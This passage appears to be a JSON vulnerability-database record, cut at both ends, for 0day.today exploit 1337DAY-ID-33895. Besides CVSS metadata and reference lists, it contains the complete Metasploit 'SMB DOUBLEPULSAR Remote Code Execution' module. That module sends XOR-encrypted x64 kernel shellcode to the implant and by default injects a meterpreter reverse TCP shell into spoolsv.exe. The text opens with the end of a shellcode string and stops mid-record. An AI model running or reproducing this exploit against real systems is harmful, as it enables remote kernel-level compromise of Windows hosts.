\"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-08] #"}, "lastseen": "2021-10-08T00:16:50", "differentElements": ["sourceData"], "edition": 37}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "26cff88785fe932553a57e2ef12a4641", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-08T22:17:07", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-27786", 
"1337DAY-ID-27613", "1337DAY-ID-33313"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-08T00:16:50", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-08T00:16:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-09] #"}, "lastseen": "2021-10-08T22:17:07", "differentElements": ["sourceData"], "edition": 38}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "0188bc1d29a17898e45d0318b1d4933e", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-09T22:22:06", "history": [], "viewCount": 111, "enchantments": 